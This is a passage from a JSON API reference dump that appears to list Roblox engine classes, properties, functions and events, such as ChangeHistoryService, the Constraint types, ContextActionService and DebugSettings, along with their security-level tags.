s":["PluginSecurity"],"Class":"ChangeHistoryService","type":"Function"},{"ReturnType":"Tuple","Arguments":[],"Name":"GetCanUndo","tags":["PluginSecurity"],"Class":"ChangeHistoryService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Redo","tags":["PluginSecurity"],"Class":"ChangeHistoryService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ResetWaypoints","tags":["PluginSecurity"],"Class":"ChangeHistoryService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"state","Default":null}],"Name":"SetEnabled","tags":["PluginSecurity"],"Class":"ChangeHistoryService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"name","Default":null}],"Name":"SetWaypoint","tags":["PluginSecurity"],"Class":"ChangeHistoryService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Undo","tags":["PluginSecurity"],"Class":"ChangeHistoryService","type":"Function"},{"Arguments":[{"Name":"waypoint","Type":"string"}],"Name":"OnRedo","tags":["PluginSecurity"],"Class":"ChangeHistoryService","type":"Event"},{"Arguments":[{"Name":"waypoint","Type":"string"}],"Name":"OnUndo","tags":["PluginSecurity"],"Class":"ChangeHistoryService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"CharacterAppearance","tags":[]},{"Superclass":"CharacterAppearance","type":"Class","Name":"BodyColors","tags":[]},{"ValueType":"BrickColor","type":"Property","Name":"HeadColor","tags":[],"Class":"BodyColors"},{"ValueType":"BrickColor","type":"Property","Name":"LeftArmColor","tags":[],"Class":"BodyColors"},{"ValueType":"BrickColor","type":"Property","Name":"LeftLegColor","tags":[],"Class":"BodyColors"},{"ValueType":"BrickColor","type":"Property","Name":"RightArmColor","tags":[],"Class":"BodyColors"},{"ValueType":"BrickColor","type":"Property","Name":"RightLegColor","tags":[],"Class":"BodyColors"},{"ValueType":"BrickColor","type":"Property","Name":"TorsoColor","tags":[],"Class":"BodyColors"},{"Superclass":"CharacterAppearance","type":"Class","Name":"CharacterMesh","tags":[]},{"ValueType":"int","type":"Property","Name":"BaseTextureId","tags":[],"Class":"CharacterMesh"},{"ValueType":"BodyPart","type":"Property","Name":"BodyPart","tags":[],"Class":"CharacterMesh"},{"ValueType":"int","type":"Property","Name":"MeshId","tags":[],"Class":"CharacterMesh"},{"ValueType":"int","type":"Property","Name":"OverlayTextureId","tags":[],"Class":"CharacterMesh"},{"Superclass":"CharacterAppearance","type":"Class","Name":"Clothing","tags":[]},{"Superclass":"Clothing","type":"Class","Name":"Pants","tags":[]},{"ValueType":"Content","type":"Property","Name":"PantsTemplate","tags":[],"Class":"Pants"},{"Superclass":"Clothing","type":"Class","Name":"Shirt","tags":[]},{"ValueType":"Content","type":"Property","Name":"ShirtTemplate","tags":[],"Class":"Shirt"},{"Superclass":"CharacterAppearance","type":"Class","Name":"ShirtGraphic","tags":[]},{"ValueType":"Content","type":"Property","Name":"Graphic","tags":[],"Class":"ShirtGraphic"},{"Superclass":"CharacterAppearance","type":"Class","Name":"Skin","tags":["deprecated"]},{"ValueType":"BrickColor","type":"Property","Name":"SkinColor","tags":[],"Class":"Skin"},{"Superclass":"Instance","type":"Class","Name":"Chat","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"partOrCharacter","Default":null},{"Type":"string","Name":"message","Default":null},{"Type":"ChatColor","Name":"color","Default":"Blue"}],"Name":"Chat","tags":[],"Class":"Chat","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"stringToFilter","Default":null},{"Type":"Instance","Name":"playerFrom","Default":null},{"Type":"Instance","Name":"playerTo","Default":null}],"Name":"FilterStringAsync","tags":[],"Class":"Chat","type":"YieldFunction"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"stringToFilter","Default":null},{"Type":"Instance","Name":"playerToFilterFor","Default":null}],"Name":"FilterStringForPlayerAsync","tags":[],"Class":"Chat","type":"YieldFunction"},{"Arguments":[{"Name":"part","Type":"Instance"},{"Name":"message","Type":"string"},{"Name":"color","Type":"ChatColor"}],"Name":"Chatted","tags":[],"Class":"Chat","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"ChatFilter","tags":["notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"ClickDetector","tags":[]},{"ValueType":"float","type":"Property","Name":"MaxActivationDistance","tags":[],"Class":"ClickDetector"},{"Arguments":[{"Name":"playerWhoClicked","Type":"Instance"}],"Name":"MouseClick","tags":[],"Class":"ClickDetector","type":"Event"},{"Arguments":[{"Name":"playerWhoHovered","Type":"Instance"}],"Name":"MouseHoverEnter","tags":[],"Class":"ClickDetector","type":"Event"},{"Arguments":[{"Name":"playerWhoHovered","Type":"Instance"}],"Name":"MouseHoverLeave","tags":[],"Class":"ClickDetector","type":"Event"},{"Arguments":[{"Name":"playerWhoClicked","Type":"Instance"}],"Name":"mouseClick","tags":["deprecated"],"Class":"ClickDetector","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"ClusterPacketCache","tags":[]},{"Superclass":"Instance","type":"Class","Name":"CollectionService","tags":[]},{"ReturnType":"Objects","Arguments":[{"Type":"string","Name":"class","Default":null}],"Name":"GetCollection","tags":[],"Class":"CollectionService","type":"Function"},{"Arguments":[{"Name":"instance","Type":"Instance"}],"Name":"ItemAdded","tags":[],"Class":"CollectionService","type":"Event"},{"Arguments":[{"Name":"instance","Type":"Instance"}],"Name":"ItemRemoved","tags":[],"Class":"CollectionService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"Color3Value","tags":[]},{"ValueType":"Color3","type":"Property","Name":"Value","tags":[],"Class":"Color3Value"},{"Arguments":[{"Name":"value","Type":"Color3"}],"Name":"Changed","tags":[],"Class":"Color3Value","type":"Event"},{"Arguments":[{"Name":"value","Type":"Color3"}],"Name":"changed","tags":["deprecated"],"Class":"Color3Value","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"Configuration","tags":[]},{"Superclass":"Instance","type":"Class","Name":"Constraint","tags":[]},{"ValueType":"Object","type":"Property","Name":"Attachment0","tags":[],"Class":"Constraint"},{"ValueType":"Object","type":"Property","Name":"Attachment1","tags":[],"Class":"Constraint"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"Constraint"},{"Superclass":"Constraint","type":"Class","Name":"BallSocketConstraint","tags":[]},{"ValueType":"bool","type":"Property","Name":"LimitsEnabled","tags":[],"Class":"BallSocketConstraint"},{"ValueType":"float","type":"Property","Name":"Restitution","tags":[],"Class":"BallSocketConstraint"},{"ValueType":"float","type":"Property","Name":"UpperAngle","tags":[],"Class":"BallSocketConstraint"},{"Superclass":"Constraint","type":"Class","Name":"HingeConstraint","tags":[]},{"ValueType":"ActuatorType","type":"Property","Name":"ActuatorType","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"AngularSpeed","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"AngularVelocity","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"CurrentAngle","tags":["readonly"],"Class":"HingeConstraint"},{"ValueType":"bool","type":"Property","Name":"LimitsEnabled","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"LowerAngle","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"MotorMaxAcceleration","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"MotorMaxTorque","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"Restitution","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"ServoMaxTorque","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"TargetAngle","tags":[],"Class":"HingeConstraint"},{"ValueType":"float","type":"Property","Name":"UpperAngle","tags":[],"Class":"HingeConstraint"},{"Superclass":"Constraint","type":"Class","Name":"MoveToConstraint","tags":[]},{"ValueType":"float","type":"Property","Name":"MaxForce","tags":[],"Class":"MoveToConstraint"},{"ValueType":"float","type":"Property","Name":"StabilizingDistance","tags":[],"Class":"MoveToConstraint"},{"ValueType":"float","type":"Property","Name":"Velocity","tags":[],"Class":"MoveToConstraint"},{"Superclass":"Constraint","type":"Class","Name":"RodConstraint","tags":[]},{"ValueType":"float","type":"Property","Name":"CurrentDistance","tags":["readonly"],"Class":"RodConstraint"},{"ValueType":"float","type":"Property","Name":"Length","tags":[],"Class":"RodConstraint"},{"Superclass":"Constraint","type":"Class","Name":"RopeConstraint","tags":[]},{"ValueType":"float","type":"Property","Name":"CurrentLength","tags":["readonly"],"Class":"RopeConstraint"},{"ValueType":"float","type":"Property","Name":"Length","tags":[],"Class":"RopeConstraint"},{"ValueType":"float","type":"Property","Name":"Restitution","tags":[],"Class":"RopeConstraint"},{"Superclass":"Constraint","type":"Class","Name":"SlidingBallConstraint","tags":[]},{"ValueType":"ActuatorType","type":"Property","Name":"ActuatorType","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"CurrentPosition","tags":["readonly"],"Class":"SlidingBallConstraint"},{"ValueType":"bool","type":"Property","Name":"LimitsEnabled","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"LowerLimit","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"MotorMaxAcceleration","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"MotorMaxForce","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"Restitution","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"ServoMaxForce","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"Speed","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"TargetPosition","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"UpperLimit","tags":[],"Class":"SlidingBallConstraint"},{"ValueType":"float","type":"Property","Name":"Velocity","tags":[],"Class":"SlidingBallConstraint"},{"Superclass":"SlidingBallConstraint","type":"Class","Name":"CylindricalConstraint","tags":[]},{"ValueType":"float","type":"Property","Name":"AzimuthalAngle","tags":[],"Class":"CylindricalConstraint"},{"ValueType":"float","type":"Property","Name":"InclinationAngle","tags":[],"Class":"CylindricalConstraint"},{"Superclass":"SlidingBallConstraint","type":"Class","Name":"PrismaticConstraint","tags":[]},{"Superclass":"Constraint","type":"Class","Name":"SpringConstraint","tags":[]},{"ValueType":"float","type":"Property","Name":"CurrentLength","tags":["readonly"],"Class":"SpringConstraint"},{"ValueType":"float","type":"Property","Name":"Damping","tags":[],"Class":"SpringConstraint"},{"ValueType":"float","type":"Property","Name":"FreeLength","tags":[],"Class":"SpringConstraint"},{"ValueType":"bool","type":"Property","Name":"LimitsEnabled","tags":[],"Class":"SpringConstraint"},{"ValueType":"float","type":"Property","Name":"MaxForce","tags":[],"Class":"SpringConstraint"},{"ValueType":"float","type":"Property","Name":"MaxLength","tags":[],"Class":"SpringConstraint"},{"ValueType":"float","type":"Property","Name":"MinLength","tags":[],"Class":"SpringConstraint"},{"ValueType":"float","type":"Property","Name":"Stiffness","tags":[],"Class":"SpringConstraint"},{"Superclass":"Instance","type":"Class","Name":"ContentFilter","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"outstandingRequests","Default":null},{"Type":"int","Name":"cacheSize","Default":null}],"Name":"SetFilterLimits","tags":["LocalUserSecurity"],"Class":"ContentFilter","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetFilterUrl","tags":["LocalUserSecurity"],"Class":"ContentFilter","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"ContentProvider","tags":[]},{"ValueType":"string","type":"Property","Name":"BaseUrl","tags":["readonly"],"Class":"ContentProvider"},{"ValueType":"int","type":"Property","Name":"RequestQueueSize","tags":["readonly"],"Class":"ContentProvider"},{"ReturnType":"void","Arguments":[{"Type":"Content","Name":"contentId","Default":null}],"Name":"Preload","tags":[],"Class":"ContentProvider","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetAssetUrl","tags":["LocalUserSecurity"],"Class":"ContentProvider","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetBaseUrl","tags":["LocalUserSecurity"],"Class":"ContentProvider","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"count","Default":null}],"Name":"SetCacheSize","tags":["LocalUserSecurity"],"Class":"ContentProvider","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"count","Default":null}],"Name":"SetThreadPool","tags":["LocalUserSecurity"],"Class":"ContentProvider","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Array","Name":"contentIdList","Default":null}],"Name":"PreloadAsync","tags":[],"Class":"ContentProvider","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"ContextActionService","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null},{"Type":"Function","Name":"functionToBind","Default":null},{"Type":"bool","Name":"createTouchButton","Default":null},{"Type":"Tuple","Name":"inputTypes","Default":null}],"Name":"BindAction","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null},{"Type":"Function","Name":"functionToBind","Default":null},{"Type":"bool","Name":"createTouchButton","Default":null},{"Type":"Tuple","Name":"inputTypes","Default":null}],"Name":"BindActionToInputTypes","tags":["deprecated"],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"UserInputType","Name":"userInputTypeForActivation","Default":null},{"Type":"KeyCode","Name":"keyCodeForActivation","Default":"Unknown"}],"Name":"BindActivate","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null},{"Type":"Function","Name":"functionToBind","Default":null},{"Type":"bool","Name":"createTouchButton","Default":null},{"Type":"Tuple","Name":"inputTypes","Default":null}],"Name":"BindCoreAction","tags":["RobloxScriptSecurity"],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null},{"Type":"UserInputState","Name":"state","Default":null},{"Type":"Instance","Name":"inputObject","Default":null}],"Name":"CallFunction","tags":["RobloxScriptSecurity"],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null},{"Type":"Instance","Name":"actionButton","Default":null}],"Name":"FireActionButtonFoundSignal","tags":["RobloxScriptSecurity"],"Class":"ContextActionService","type":"Function"},{"ReturnType":"Dictionary","Arguments":[],"Name":"GetAllBoundActionInfo","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"Dictionary","Arguments":[{"Type":"string","Name":"actionName","Default":null}],"Name":"GetBoundActionInfo","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"string","Arguments":[],"Name":"GetCurrentLocalToolIcon","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null},{"Type":"string","Name":"description","Default":null}],"Name":"SetDescription","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null},{"Type":"string","Name":"image","Default":null}],"Name":"SetImage","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null},{"Type":"UDim2","Name":"position","Default":null}],"Name":"SetPosition","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null},{"Type":"string","Name":"title","Default":null}],"Name":"SetTitle","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null}],"Name":"UnbindAction","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"UserInputType","Name":"userInputTypeForActivation","Default":null},{"Type":"KeyCode","Name":"keyCodeForActivation","Default":"Unknown"}],"Name":"UnbindActivate","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"UnbindAllActions","tags":[],"Class":"ContextActionService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"actionName","Default":null}],"Name":"UnbindCoreAction","tags":["RobloxScriptSecurity"],"Class":"ContextActionService","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"actionName","Default":null}],"Name":"GetButton","tags":[],"Class":"ContextActionService","type":"YieldFunction"},{"Arguments":[{"Name":"actionAdded","Type":"string"},{"Name":"createTouchButton","Type":"bool"},{"Name":"functionInfoTable","Type":"Dictionary"}],"Name":"BoundActionAdded","tags":["RobloxScriptSecurity"],"Class":"ContextActionService","type":"Event"},{"Arguments":[{"Name":"actionChanged","Type":"string"},{"Name":"changeName","Type":"string"},{"Name":"changeTable","Type":"Dictionary"}],"Name":"BoundActionChanged","tags":["RobloxScriptSecurity"],"Class":"ContextActionService","type":"Event"},{"Arguments":[{"Name":"actionRemoved","Type":"string"},{"Name":"functionInfoTable","Type":"Dictionary"}],"Name":"BoundActionRemoved","tags":["RobloxScriptSecurity"],"Class":"ContextActionService","type":"Event"},{"Arguments":[{"Name":"actionName","Type":"string"}],"Name":"GetActionButtonEvent","tags":["RobloxScriptSecurity"],"Class":"ContextActionService","type":"Event"},{"Arguments":[{"Name":"toolEquipped","Type":"Instance"}],"Name":"LocalToolEquipped","tags":[],"Class":"ContextActionService","type":"Event"},{"Arguments":[{"Name":"toolUnequipped","Type":"Instance"}],"Name":"LocalToolUnequipped","tags":[],"Class":"ContextActionService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"Controller","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"Button","Name":"button","Default":null},{"Type":"string","Name":"caption","Default":null}],"Name":"BindButton","tags":[],"Class":"Controller","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Button","Name":"button","Default":null}],"Name":"GetButton","tags":[],"Class":"Controller","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Button","Name":"button","Default":null}],"Name":"UnbindButton","tags":[],"Class":"Controller","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Button","Name":"button","Default":null},{"Type":"string","Name":"caption","Default":null}],"Name":"bindButton","tags":["deprecated"],"Class":"Controller","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Button","Name":"button","Default":null}],"Name":"getButton","tags":["deprecated"],"Class":"Controller","type":"Function"},{"Arguments":[{"Name":"button","Type":"Button"}],"Name":"ButtonChanged","tags":[],"Class":"Controller","type":"Event"},{"Superclass":"Controller","type":"Class","Name":"HumanoidController","tags":[]},{"Superclass":"Controller","type":"Class","Name":"SkateboardController","tags":[]},{"ValueType":"float","type":"Property","Name":"Steer","tags":["readonly"],"Class":"SkateboardController"},{"ValueType":"float","type":"Property","Name":"Throttle","tags":["readonly"],"Class":"SkateboardController"},{"Arguments":[{"Name":"axis","Type":"string"}],"Name":"AxisChanged","tags":[],"Class":"SkateboardController","type":"Event"},{"Superclass":"Controller","type":"Class","Name":"VehicleController","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ControllerService","tags":["notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"CookiesService","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"DeleteCookieValue","tags":["RobloxSecurity"],"Class":"CookiesService","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"GetCookieValue","tags":["RobloxSecurity"],"Class":"CookiesService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"string","Name":"value","Default":null}],"Name":"SetCookieValue","tags":["RobloxSecurity"],"Class":"CookiesService","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"CustomEvent","tags":["deprecated"]},{"ReturnType":"Objects","Arguments":[],"Name":"GetAttachedReceivers","tags":[],"Class":"CustomEvent","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"newValue","Default":null}],"Name":"SetValue","tags":[],"Class":"CustomEvent","type":"Function"},{"Arguments":[{"Name":"receiver","Type":"Instance"}],"Name":"ReceiverConnected","tags":[],"Class":"CustomEvent","type":"Event"},{"Arguments":[{"Name":"receiver","Type":"Instance"}],"Name":"ReceiverDisconnected","tags":[],"Class":"CustomEvent","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"CustomEventReceiver","tags":["deprecated"]},{"ValueType":"Object","type":"Property","Name":"Source","tags":[],"Class":"CustomEventReceiver"},{"ReturnType":"float","Arguments":[],"Name":"GetCurrentValue","tags":[],"Class":"CustomEventReceiver","type":"Function"},{"Arguments":[{"Name":"event","Type":"Instance"}],"Name":"EventConnected","tags":[],"Class":"CustomEventReceiver","type":"Event"},{"Arguments":[{"Name":"event","Type":"Instance"}],"Name":"EventDisconnected","tags":[],"Class":"CustomEventReceiver","type":"Event"},{"Arguments":[{"Name":"newValue","Type":"float"}],"Name":"SourceValueChanged","tags":[],"Class":"CustomEventReceiver","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"DataModelMesh","tags":["notbrowsable"]},{"ValueType":"Vector3","type":"Property","Name":"Offset","tags":[],"Class":"DataModelMesh"},{"ValueType":"Vector3","type":"Property","Name":"Scale","tags":[],"Class":"DataModelMesh"},{"ValueType":"Vector3","type":"Property","Name":"VertexColor","tags":[],"Class":"DataModelMesh"},{"Superclass":"DataModelMesh","type":"Class","Name":"BevelMesh","tags":["deprecated","notbrowsable"]},{"Superclass":"BevelMesh","type":"Class","Name":"BlockMesh","tags":[]},{"Superclass":"BevelMesh","type":"Class","Name":"CylinderMesh","tags":[]},{"Superclass":"DataModelMesh","type":"Class","Name":"FileMesh","tags":[]},{"ValueType":"Content","type":"Property","Name":"MeshId","tags":[],"Class":"FileMesh"},{"ValueType":"Content","type":"Property","Name":"TextureId","tags":[],"Class":"FileMesh"},{"Superclass":"FileMesh","type":"Class","Name":"SpecialMesh","tags":[]},{"ValueType":"MeshType","type":"Property","Name":"MeshType","tags":[],"Class":"SpecialMesh"},{"Superclass":"Instance","type":"Class","Name":"DataStoreService","tags":["notCreatable"]},{"ValueType":"bool","type":"Property","Name":"LegacyNamingScheme","tags":["LocalUserSecurity"],"Class":"DataStoreService"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"name","Default":null},{"Type":"string","Name":"scope","Default":"global"}],"Name":"GetDataStore","tags":[],"Class":"DataStoreService","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetGlobalDataStore","tags":[],"Class":"DataStoreService","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"name","Default":null},{"Type":"string","Name":"scope","Default":"global"}],"Name":"GetOrderedDataStore","tags":[],"Class":"DataStoreService","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Debris","tags":[]},{"ValueType":"int","type":"Property","Name":"MaxItems","tags":["deprecated"],"Class":"Debris"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"item","Default":null},{"Type":"double","Name":"lifetime","Default":"10"}],"Name":"AddItem","tags":[],"Class":"Debris","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"enabled","Default":null}],"Name":"SetLegacyMaxItems","tags":["LocalUserSecurity"],"Class":"Debris","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"item","Default":null},{"Type":"double","Name":"lifetime","Default":"10"}],"Name":"addItem","tags":["deprecated"],"Class":"Debris","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"DebugSettings","tags":["notbrowsable"]},{"ValueType":"int","type":"Property","Name":"AltCdnFailureCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"AltCdnSuccessCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"AvailablePhysicalMemory","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"BlockMeshSize","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"string","type":"Property","Name":"CPU","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"CdnFailureCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"double","type":"Property","Name":"CdnResponceTime","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"CdnSuccessCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"CpuCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"CpuSpeed","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"DataModel","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"double","type":"Property","Name":"ElapsedTime","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"ErrorReporting","type":"Property","Name":"ErrorReporting","tags":[],"Class":"DebugSettings"},{"ValueType":"string","type":"Property","Name":"GfxCard","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"InstanceCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"bool","type":"Property","Name":"IsFmodProfilingEnabled","tags":[],"Class":"DebugSettings"},{"ValueType":"bool","type":"Property","Name":"IsProfilingEnabled","tags":[],"Class":"DebugSettings"},{"ValueType":"bool","type":"Property","Name":"IsScriptStackTracingEnabled","tags":[],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"JobCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"double","type":"Property","Name":"LastCdnFailureTimeSpan","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"LuaRamLimit","tags":[],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"NameDatabaseBytes","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"NameDatabaseSize","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"bool","type":"Property","Name":"OsIs64Bit","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"string","type":"Property","Name":"OsPlatform","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"OsPlatformId","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"string","type":"Property","Name":"OsVer","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"PageFaultsPerSecond","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"PageFileBytes","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"float","type":"Property","Name":"PixelShaderModel","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"PlayerCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"PrivateBytes","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"PrivateWorkingSetBytes","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"double","type":"Property","Name":"ProcessCores","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"ProcessorTime","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"double","type":"Property","Name":"ProfilingWindow","tags":[],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"RAM","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"bool","type":"Property","Name":"ReportExtendedMachineConfiguration","tags":[],"Class":"DebugSettings"},{"ValueType":"bool","type":"Property","Name":"ReportSoundWarnings","tags":[],"Class":"DebugSettings"},{"ValueType":"string","type":"Property","Name":"Resolution","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"RobloxFailureCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"string","type":"Property","Name":"RobloxProductName","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"double","type":"Property","Name":"RobloxRespoceTime","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"RobloxSuccessCount","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"string","type":"Property","Name":"RobloxVersion","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"string","type":"Property","Name":"SIMD","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"string","type":"Property","Name":"SystemProductName","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"TickCountSampleMethod","type":"Property","Name":"TickCountPreciseOverride","tags":[],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"TotalPhysicalMemory","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"TotalProcessorTime","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"float","type":"Property","Name":"VertexShaderModel","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"VideoMemory","tags":["readonly"],"Class":"DebugSettings"},{"ValueType":"int","type":"Property","Name":"VirtualBytes","tags":["readonly"],"Class":"DebugSettings"},{"ReturnType":"void","Arguments":[],"Name":"LegacyScriptMode","tags":["LocalUserSecurity","deprecated"],"Class":"DebugSettings","type":"Function"},{"ReturnType":"Tuple","Arguments":[],"Name":"ResetCdnFailureCounts","tags":["LocalUserSecurity"],"Class":"DebugSettings","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"value","Default":null}],"Name":"SetBlockingRemove","tags":["LocalUserSecurity"],"Class":"DebugSettings","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"DebuggerBreakpoint","tags":["notCreatable"]},{"ValueType":"string","type":"Property","Name":"Condition","tags":[],"Class":"DebuggerBreakpoint"},{"ValueT